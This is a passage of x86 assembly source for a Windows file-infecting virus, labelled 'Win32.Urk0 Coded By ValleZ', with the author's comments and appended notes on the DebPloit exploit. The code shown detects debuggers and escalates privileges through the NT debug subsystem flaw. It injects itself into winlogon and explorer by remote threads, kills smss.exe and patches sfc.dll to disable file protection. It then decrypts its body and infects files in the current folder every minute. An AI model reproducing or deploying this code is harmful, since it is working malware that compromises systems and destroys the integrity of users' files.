GezApi eax,GetWindowsDirectoryACRC,GWDNameLen ;eax -> GetWindowsDir pop esi push esi push 200 push esi call eax pop esi CalcLenString mov edi,esi add edi,ecx mov byte ptr [edi],'\' inc edi mov dword ptr [edi],'LPXE' add edi,4 mov dword ptr [edi],'RERO' add edi,4 mov dword ptr [edi],'EXE.' add edi,4 mov dword ptr [edi],0 CalcLenString ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;DetectSICE try to detect softice,and in the case softice was detected,then stop execution. ;in: ; eax = kernel base ;out: ; none ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; DetectSICE: pushad push eax ;check sice in 9x push 00000000h push 00000080h push 00000003h push 00000000h push 00000001h push 0c0000000h lea esi,[ebp + SICE9X] push esi GezApi eax,CreateFileACRC,CFNameLen call eax inc eax jz NoSICE9X call $ NoSICE9X: mov eax,[esp] push 00000000h push 00000080h push 00000003h push 00000000h push 00000001h push 0C0000000h lea esi,[ebp + SICENT] push esi GezApi eax,CreateFileACRC,CFNameLen call eax inc eax jz NoSICENT call $ NoSICENT: pop eax popad ret SICE9X db "\\.\SICE",0 SICENT db "\\.\NTICE",0 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;NT ZONE !�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�! ;NT ZONE !�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�! ;NT ZONE !�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�! ;NT ZONE !�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�! ;NT ZONE !�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�!�! ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Well...now we are in NT.We will fight agresively against NT for ;getting full privileges ;/ Virus its very different if we are ;in NT.Here we dont load and dont inject code to explorer.exe. ;Here we will try to get full privileges with some methods ;and later we will infect files. ;NT part works in this manner: i try to get anough privileges to open winlogon and ;inject code there(with i WannaCanDebug).If i dont get anough,i use a second method. ;I use a flaw in NT.I havent discovered that flaw.I speaking about Debploit method. ;You can search about this in www.securiteam.com in NT focus.With this,i connect to ;dbgss and i say it that it gives me a duplicate handle to winlogon,however,it will ;give me it with full privileges :D ... There is a problem with this...If i say ;dbgss i am the debugger of winlogon,and winlogon is my debugee process(i attach ;it) when my process terminated,winlogon will finish too and system will reboot. ;For this reason,when i infect winlogon,since winlogon injected code,i kill smss ;(where is implemented dbgss) and smss will not kill winlogon.In this manner,only first ;infected file executed will inject code in winlogon becoz when second infected program ;was executed,it will not find dbgss. ;In winlogon,virus disable sfp with Ratter and Benny method(29a number 6).Later,it ;gets a handle to explorer and inject code there,and create a remote thread in ;explorer:There,ExplorerCode is executed.This code will infect current folder of ;explorer.exe each 60 seconds. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;NTInvasion try to KILL NT ;O ;in: ; eax = kernel base ;out: ; none ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; NTInvasion: mov ecx,cs xor cl,cl jecxz ContinueNT ret ContinueNT: mov [ebp + NtKernel],eax callz GetLibrarys callz DebuggerTrickz callz FreeLibrarys ret NtKernel dd 0 NtAdvapi dd 0 NtPsapi dd 0 NtRasapi dd 0 Ntdll dd 0 ;;;;;;;;;;;;;;;;;;;; GetLibrarys: pushad ;first,ill try to get ntdll base from PEB structure mov eax,dword ptr fs:[30h] ;PEB pointer mov eax,dword ptr [eax + 0ch] ;PEB_LDR_DATA mov eax,dword ptr [eax + 1ch] ;LIST_ENTRY mov eax,dword ptr [eax + 8h] ;ntdll.dll base mov [ebp + Ntdll],eax mov eax,[ebp + NtKernel] GezApi eax,LoadLibraryACRC,LLNameLen push eax lea ebx,[ebp + advapi] push ebx call eax mov [ebp + NtAdvapi],eax lea ebx,[ebp + psapi] push ebx call dword ptr [esp + 4] mov [ebp + NtPsapi],eax lea ebx,[ebp + rasapi] push ebx call dword ptr [esp + 4] mov [ebp + NtRasapi],eax pop eax popad ret advapi db 'advapi32.dll',0 psapi db 'psapi.dll',0 rasapi db 'rasapi32.dll',0 ;;;;;;;;;;;;;;;;;;;; FreeLibrarys: pushad mov eax,[ebp + NtKernel] GezApi eax,FreeLibraryCRC,FLNameLen push eax push dword ptr [ebp + NtAdvapi] call dword ptr [esp + 4] push dword ptr [ebp + NtPsapi] call dword ptr [esp + 4] push dword ptr [ebp + NtRasapi] call dword ptr [esp + 4] pop eax popad ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;DebuggerTrickz try to gain privileges. ;in: ; none ; ;out: ; eax = 1 no error eax = 0 error ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; DebuggerTrickz: pushad or eax,eax jz NoTrickGoOut callz GetWinlogon or eax,eax jz ContinueTrick NoTrickGoOut: popad ret ContinueTrick: ;now i have a handle to winlogon.exe...however i only have this access: ;PROCESS_VM_READ and PROCESS_QUERY_INFORMATION ;now we need a handle to the process but with VM_WRITE,...privileges. ;ill try to open Winlogon with full privileges...if i dont get it ;with full privileges ill use same method as debploit exploit. ;You can read about this in www.securiteam.com NT focus... ;in august of 2002 if i remember well. push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen call eax push dword ptr [ebp + WinlogonID] push 0 push 43Ah;privileges i need mov eax,[ebp + NtKernel] GezApi eax,OpenProcessCRC,OPNameLen call eax or eax,eax jz Debploit sub esp,80h callz AttackWinlogon ;) or eax,eax jz DebuggerNoError jmpz DebuggerError Debploit: push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen call eax mov ecx,20h SaveSpaceMESSAGE: push 00000000h loop SaveSpaceMESSAGE ;space for DBG_SS_CP_LPC_MESSAGE mov eax,[ebp + Ntdll] GezApi eax,NtConnectPortCRC,NCPNameLen push 0 push 0 push 0 push 0 push 0 lea ebx,[ebp + SECURITY_QUALITY_OF_SERVICE] push ebx lea ebx,[ebp + USbuf] mov [ebp + PUSbuf],ebx push eax mov eax,ebx xor edx,edx mov ebx,2 div ebx or edx,edx jz NoAlign lea ebx,[ebp + USbuf2] mov [ebp + PUSbuf],ebx NoAlign: pop eax ;well...here we have a problem...read about NTSTATUS_DATATYPE_MISALIGNMENT ;(80000002h)for knowing this problem and you will discover how Microsoft ;do a easier life for you :P Why i must align a data for giving ;parameters to a api...WHYYYYY??? Why M$,the richest company in the world, ;cannot do a S.O that aligns my datas!!??? :( Why i must spend two days ;trying to solve this problem!!!! damn ;( lea ebx,[ebp + UNICODE_STRING] push ebx lea ebx,[ebp + PortHandle] push ebx call eax;ZwConnectPort ;note i call apis from ntdll.dll with a call instead a syscall...however they can be ;called with a syscall too. cmp eax,080000000h jae DebuggerError mov eax,[ebp + Ntdll] GezApi eax,DbgUiConnectToDbgCRC,DUCTDNameLen call eax cmp eax,080000000h jae DebuggerError ;for now,all right...now i must send a message to dbgss, ;a create process request,and it will give me a duplicated handle ;to the process that ill specify in the message...with a small ;different...this handle will have PROCESS_TERMINATE, ;PROCESS_CREATE_THREAD!!!,PROCESS_VM_READ, ;PROCESS_VM_OPERATION,PROCESS_VM_WRITE!!!,PROCESS_DUP_HANDLE, ;PROCESS_QUERY_INFORMATION,READ_CONTROL privileges ;D ;we have already reserved space for DBG_SS_CP_LPC_MESSAGE ;in the stack in the start of debploit zone.You can see ;DBG_SS_CP_LPC_MESSAGE struct in the end of virus code mov word ptr [esp],38h ;DataSize mov word ptr [esp + 2h],80h ;MessageSize mov dword ptr [esp + 18h],2h ;CREATE_PROCESS_REQUEST mov eax,[ebp + WinlogonID] mov dword ptr [esp + 20h],eax ;debugee PID...that i want duplicate handle mov eax,[ebp + NtKernel] GezApi eax,GetCurrentProcessIdCRC,GCPINameLen call eax mov dword ptr [esp + 2ch],eax ;debugger PID...me mov eax,[ebp + NtKernel] GezApi eax,GetCurrentThreadIdCRC,GCTINameLen call eax mov dword ptr [esp + 30h],eax ;debugger TID...me too push esp push dword ptr [ebp + PortHandle] mov eax,[ebp + Ntdll] GezApi eax,ZwRequestPortCRC,ZRPNameLen call eax ;now we dont need msg space reserved in stack so we use that space in ;stack for or DEBUG_EVENT WaitEvent: push 512 ;esp + 4 -> DEBUG_EVENT mov eax,esp add eax,4 push eax mov eax,[ebp + NtKernel] GezApi eax,WaitForDebugEventCRC,WFDENameLen call eax mov eax,[esp + 4] ;dwProcessId mov ebx,[esp + 8] ;dwThreadId push 00010002h ;CONTINUE_DEBUG push ebx push eax mov eax,[ebp + NtKernel] GezApi eax,ContinueDebugEventCRC,CDENameLen call eax cmp dword ptr [esp],3 ;DugEventCode == CREATE_PROCESS_DEBUG_EVENT??? je GoodEvent jmpz WaitEvent GoodEvent: ;we have got the waited debug event and there ;we can find the duplicate handle to winlogon :D mov eax,[esp + 10h] ;DEBUG_EVENT.u.CreateProcessInfo.hProcess mov [ebp + WinlogonHand],eax ;we save the handle with full acess to winlogon ;now i have a problem.When this process terminates,winlogon will terminate too becouse ;winlogon is the debuggee process and this is the debugger. ;i think a dramatic solution...terminate smss.exe.smss initiates winlogon and win32 subsystem ;and when system hangs,it take the control and draw the blue screen of death :P.In addition ;it has implemented the dbgss.If only these are their functions,we can terminate smss and in ;this manner smms will not terminate winlogon after my process terminates...in addition we ;have broke debug subsystem ;) ;Ill do this since winlogon later i inject my code there. ;note if smss is terminated,next time virus will be executed it will not find dbgss subsystem ;and by this reason it will not infect winlogon again. callz AttackWinlogon or eax,eax jnz DebuggerError DebuggerNoError: add esp,80h popad xor eax,eax inc eax ret DebuggerError: add esp,80h popad xor eax,eax ret PortHandle dd 0 UNICODE_STRING: USlen dw 26 USmaxlen dw 28 PUSbuf dd 0 db 0 ;i have two strings becoz if USbuf is not alignmented then USbuf2 is it. USbuf dw '\','D','b','g','S','s','A','p','i','P','o','r','t',0 db 0 USbuf2 dw '\','D','b','g','S','s','A','p','i','P','o','r','t',0 SECURITY_QUALITY_OF_SERVICE: SQOSlen dd 12 ImpersonationLevel dd 2;SecurityImpersonation ContextTrackingMode db 1 EffectiveOnly db 1 db 34h db 00h ;;;;;;;;;;;;;;;;;;;;; GetWinlogon: ;in:none out: WinlogonHand with winlogon process handle ; eax = 0 if no error pushad mov ecx,200h SaveSpaceSearchingWinlogon: push 00000000h loop SaveSpaceSearchingWinlogon ;esp -> array of id of processes mov eax,esp lea ebx,[ebp + Needed] push ebx push 4*200h push eax mov eax,[ebp + NtPsapi] GezApi eax,EnumProcessesCRC,EPSNameLen call eax dec eax jnz GetWinlogonOutError_ ;esp -> array mov esi,esp lodsd SearchWinlogon: lodsd push esi or eax,eax jz GetWinlogonOutError ;vvv mov [ebp + WinlogonID],eax push eax push 0 push 10h or 400h mov eax,[ebp + NtKernel] GezApi eax,OpenProcessCRC,OPNameLen call eax or eax,eax jz NoWinlogonFound ;eax = process handle mov [ebp + WinlogonHand],eax lea ebx,[ebp + Needed] push ebx push 4 lea ebx,[ebp + WinlogonModuleHand] push ebx push eax mov eax,[ebp + NtPsapi] GezApi eax,EnumProcessModulesCRC,EPMNameLen call eax dec eax jnz NoWinlogonFound push 50 lea eax,[ebp + WinlogonModuleName] push eax push dword ptr [ebp + WinlogonModuleHand] push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtPsapi] GezApi eax,GetModuleBaseNameACRC,GMBNNameLen call eax lea esi,[ebp + WinlogonModuleName] lodsd or eax,20202020h cmp eax,'lniw' winl equ $ - 4 jne NoWinlogonFound lodsd or eax,20202020h cmp eax,'nogo' ogon equ $ - 4 jne NoWinlogonFound ;^^^ WinLogonFound: pop esi GetWinlogonOut: add esp,4*200h popad xor eax,eax ret NoWinlogonFound: pop esi jmp SearchWinlogon GetWinlogonOutError: pop esi GetWinlogonOutError_: add esp,4*200h popad xor eax,eax inc eax ret ;;;;;;;;;;;;;;;;;;;;; AttackWinlogon: ;in:none ;out: eax = 1 error eax = 0 no error push PAGE_EXECUTE_READWRITE push MEM_COMMIT or MEM_RESERVE push EVirus - SVirus push 0 push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtKernel] GezApi eax,VirtualAllocExCRC,VANameLen call eax or eax,eax jz AttackWinlogonError mov [ebp + WinlogonVirusBase],eax mov ecx,[ebp + NtKernel] mov ebx,[ebp + WinlogonHand] lea edx,[ebp + SVirus] mov esi,EVirus - SVirus Writez ecx,ebx,eax,edx,esi or eax,eax jz AttackWinlogonError push 0 push 0 lea eax,[ebp + Needed] push eax;pointer to a variable to be passed to the thread function mov eax,[ebp + WinlogonVirusBase] add eax,WinlogonCode - SVirus push eax push 0 ;stack size push 0 push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtKernel] GezApi eax,CreateRemoteThreadCRC,CRTNameLen call eax or eax,eax jz AttackWinlogonError AttackWinlogonNoError: push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen call eax xor eax,eax ret AttackWinlogonError: push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen call eax xor eax,eax inc eax ret Needed dd 0 WinlogonModuleHand dd 0 WinlogonModuleName db 50 dup(0) WinlogonHand dd 0 WinlogonID dd 0 WinlogonVirusBase dd 0 SmssHand dd 0 ExplorerHand dd 0 ExplorerID dd 0 ExplorerVirusBase dd 0 ExplorerModuleHand dd 0 db "Win32.Urk0 Coded By ValleZ",0 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; WinlogonCode: ;When i inject code to winlogon,i create a remote thread that will start execution here pop eax ;remove parameter passed callz WinlogonCodeDoff WinlogonCodeDoff: pop ebp sub ebp,offset WinlogonCodeDoff callz GetLibrarys mov dword ptr [ebp + winl],'lpxe' mov dword ptr [ebp + ogon],'rero' callz GetWinlogon ;i use same function to get smss.exe handle and terminate it. mov eax,[ebp + WinlogonHand] mov [ebp + ExplorerHand],eax mov eax,[ebp + WinlogonID] mov [ebp + ExplorerID],eax mov eax,[ebp + WinlogonModuleHand] mov [ebp + ExplorerModuleHand],eax mov dword ptr [ebp + winl],'ssms' mov dword ptr [ebp + ogon],'exe.' callz GetWinlogon ;i use same function to get smss.exe handle and terminate it. mov eax,[ebp + WinlogonHand] mov [ebp + SmssHand],eax mov dword ptr [ebp + winl],'lniw' mov dword ptr [ebp + ogon],'nogo' push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen call eax push dword ptr [ebp + WinlogonID];really smss.exe ID push 0 push 1h;privileges that i need for terminating smss.exe mov eax,[ebp + NtKernel] GezApi eax,OpenProcessCRC,OPNameLen ;i open smss.exe call eax push 0 push dword ptr [ebp + SmssHand] mov eax,[ebp + Ntdll] GezApi eax,NtTerminateProcessCRC,NTPNameLen call eax ;i have terminated smss.exe and now it cannot kill winlogon ;D i dont know if this method ;is a few dramatic...i know if i kill smss.exe i fuck dbgss(mmm im thinking then im ;fuckin debbugers :-m ),and when windows terminates with error smss will not show ;the typical blue screen(this is a problem???)...i dont know if i am fuckin other ;importants parts...i have not read others funcionalitys...only it loads winlogon ;and win32 subsystem(csrss.exe),however this task is already done.I think i can ;kill smss.exe. ;now,i am in w1nl0g0n with M4x Pr1v1l3g3s ;D in this point our imagination will do all ;first,i will disable sfp ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; SfcDisable: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; lea eax,[ebp + sfc] push eax mov eax,[ebp + NtKernel] GezApi eax,LoadLibraryACRC,LLNameLen call eax or eax,eax jz ErrorSfcDisable mov [ebp + NtSfc],eax mov esi,[eax + 3ch] add esi,eax ;esi -> PE movzx eax,word ptr [esi + 14h];size of optional mov ecx,[eax + esi + 18h + 10h];size of section mov esi,[eax + esi + 18h + 0ch];virtual address of first section of sfc.dll add esi,dword ptr [ebp + NtSfc] ;esi -> code section SearchCodeToPatch: pushad lea edi,[ebp + CodeToSearch] mov ecx,11 rep cmpsb popad je CodeToPatchFound inc esi loop SearchCodeToPatch jmpz ErrorSfcDisable CodeToPatchFound: ;now we patch code with a call to ExitThread push esi mov eax,[ebp + NtKernel] GezApi eax,ExitThreadCRC,ETNameLen pop esi mov [ebp + PatchExitThreadDir],eax push esi ;i unprotect the mem where i go to patch ;UnprotectMem ; eax -> base of kernel ; esi -> dir of memory that will be writable. ; ecx -> bytes of that memory. ; ebx -> handle of the process where is the memory.If 0 this process mov eax,[ebp + NtKernel] mov ebx,0 mov ecx,_PatchCode - PatchCode callz UnprotectMem pop esi mov edi,esi lea esi,[ebp + PatchCode] mov ecx,_PatchCode - PatchCode PatchIt: movsb loop PatchIt ErrorSfcDisable: ;if we have jumped here without executing CodeToPatchFound part,sfc is not disabled ;now ill infect files ;first all,ill uncrypt since SCode to SCode part ;we encrypted Code with random key since FFFF0000h to FFFFFFFFh so ;now we must search the key using brute force xor ecx,ecx mov edx,dword ptr [ebp + SCode] WLWhatKey: xor edx,ecx cmp edx,000000E8h je WLKeyFound xor edx,ecx loop WLWhatKey WLKeyFound: mov edx,ecx ;edx = key mov ecx,(ECode - SCode)/4 lea esi,[ebp + SCode] WLUncrypt: dec ecx xor dword ptr [esi + 4*ecx],edx or ecx,ecx jnz WLUncrypt mov eax,[ebp + NtKernel] mov [ebp + kernel],eax ;code since SCode to ECode uses kernel variable so ;i must initializate it ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; AttackExplorer: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;now ill inject the code to explorer.exe from winlogon and there ill hook CreateFileA api ;) ;i thought to hook FindFirstFile and FindNextFile in explorer but i think its anought ;with CreateFileA push dword ptr [ebp + ExplorerHand] mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen call eax push dword ptr [ebp + ExplorerID] push 0 push 43ah;privileges that i need mov eax,[ebp + NtKernel] GezApi eax,OpenProcessCRC,OPNameLen call eax or eax,eax jz AttackExplorerError mov [ebp + ExplorerHand],eax push PAGE_EXECUTE_READWRITE push MEM_COMMIT or MEM_RESERVE push EVirus - SVirus push 0 push dword ptr [ebp + ExplorerHand] mov eax,[ebp + NtKernel] GezApi eax,VirtualAllocExCRC,VANameLen call eax or eax,eax jz AttackExplorerError mov [ebp + ExplorerVirusBase],eax mov ecx,[ebp + NtKernel] mov ebx,[ebp + ExplorerHand] lea edx,[ebp + SVirus] mov esi,EVirus - SVirus Writez ecx,ebx,eax,edx,esi or eax,eax jz AttackExplorerError push 0 push 0 lea eax,[ebp + Needed] push eax ;pointer to a variable passed as parameter to thread function mov eax,[ebp + ExplorerVirusBase] add eax,ExplorerCode - SVirus push eax push 0;stack size push 0 push dword ptr [ebp + ExplorerHand] mov eax,[ebp + NtKernel] GezApi eax,CreateRemoteThreadCRC,CRTNameLen call eax AttackExplorerError: push dword ptr [ebp + ExplorerHand] mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen call eax ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ExitWinlogonThread: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; push 0 mov eax,[ebp + NtKernel] GezApi eax,ExitThreadCRC,ETNameLen call eax sfc db 'sfc.dll' NtSfc dd 0 CodeToSearch db 6Ah,01h,6Ah,01h,0FFh,33h,0FFh,73h,04h,0FFh,15h PatchCode: push 0 mov eax,11111111h PatchExitThreadDir equ dword ptr $ - 4 call eax _PatchCode: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ExplorerCode: callz NtExplorerDOffset NtExplorerDOffset: pop ebp sub ebp,offset NtExplorerDOffset CurrentFolderInfection: mov eax,[ebp + NtKernel] GezApi eax,SleepCRC,SNameLen push 60000 ;1 minute call eax ;Sleep for 1 minute mov eax,[ebp + NtKernel] GezApi eax,GetCurrentDirectoryACRC,SCDNameLen lea ebx,[ebp + buffy] push ebx push 256 call eax lea ebx,[ebp + buffy] callz InfectCurrentFolder jmpz CurrentFolderInfection ;since explorer,virus will infect current folder in intervals of 1 minute buffy db 256 dup (?) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Pad2: PADDING2 equ 4 - (((Pad2 - ECode) - (4*((Pad2 - ECode)/4)))) db PADDING2 dup (0) EVirus: end start end HERE YOU CAN FIND SOME EXTRA INFORMATION FOR VIRUS UNDERSTANDING DebPloit allows Everyone to get handle to Any process or thread. Handles have enough access to promote everyone to system/admin (in the case Target is running under LocalSystem, Administrator account). Works on: Any MS Windows NT 4.0, Windows 2000 (SPs before Mar-12-2002). Former NTs weren't tested. Discovered: Mar-09-2002. Author: Radim "EliCZ" Picha. Bugs@EliCZ.cjb.net. http://www.anticracking.sk/EliCZ. Details: Exploit\DebPloit.h. Principle: Ask debugging subsystem (lives in smss.exe) to create (duplicate) handle(s) to Target for you: 1. Become dbgss client (DbgUiConnectToDbg). 2. Connect to DbgSsApiPort LPC port (ZwConnectPort).Everyone has access to this port. 3. Ask dbgss to handle CreateProcess SsApi with client id (or pid or tid only) of Target (ZwRequestPort). 4. Wait for dbgss to reply with CREATE_PROCESS_DEBUG_EVENT (WaitForDebugEvent). Message contains duplicated handle(s). 5. When debugger's thread terminates(e.g. on logoff), Target process or thread is terminated too (like it was regularly debugged). struct _DBG_SS_CP_LPC_MESSAGE { USHORT DataSize; //00 USHORT MessageSize; //02 USHORT MessageType; //04 USHORT VirtualRangesOffset; //06 DWORD CallerPid; //08 DWORD CallerTid; //0C ULONG MessageId; //10 ULONG SectionSize; //14 DWORD dwSsDebugEventCode; //18 DWORD Status; //1C DWORD DebuggeePID; //20 DWORD DebuggeeTID; //24 PVOID pDbgSsKmMsg; //28 //size ~ 0x78 DWORD DebuggerPID; //2C DWORD DebuggerTID; //30 DWORD Unknown34; //34 DWORD hFile; //38 LPVOID lpBaseOfImage; //3C DWORD dwDebugInfoFileOffset;//40 DWORD nDebugInfoSize; //44 LPVOID lpThreadLocalBase; //48 LPTHREAD_START_ROUTINE lpStartAddress; //4C LPVOID lpImageName; //50 WORD fUnicode; //54 WORD ImageName[(MAX_DBG_SS_CP_LPC_MESSAGE_SIZE - 0x56)/sizeof(WORD)]; //56 pro forma } MAX_DBG_SS_CP_LPC_MESSAGE_SIZE = 80h NTSYSAPI NTSTATUS NTAPI ZwConnectPort ( OUT PHANDLE ClientPortHandle, IN PUNICODE_STRING ServerPortName, IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, IN OUT PLPC_THIS_SIDE_MEMORY ClientSharedMemory OPTIONAL, IN OUT PLPC_OTHER_SIDE_MEMORY ServerSharedMemory OPTIONAL, OUT PULONG MaximumMessageLength OPTIONAL, IN OUT PVOID ConnectionInfo OPTIONAL, IN OUT PULONG ConnectionInfoLength OPTIONAL );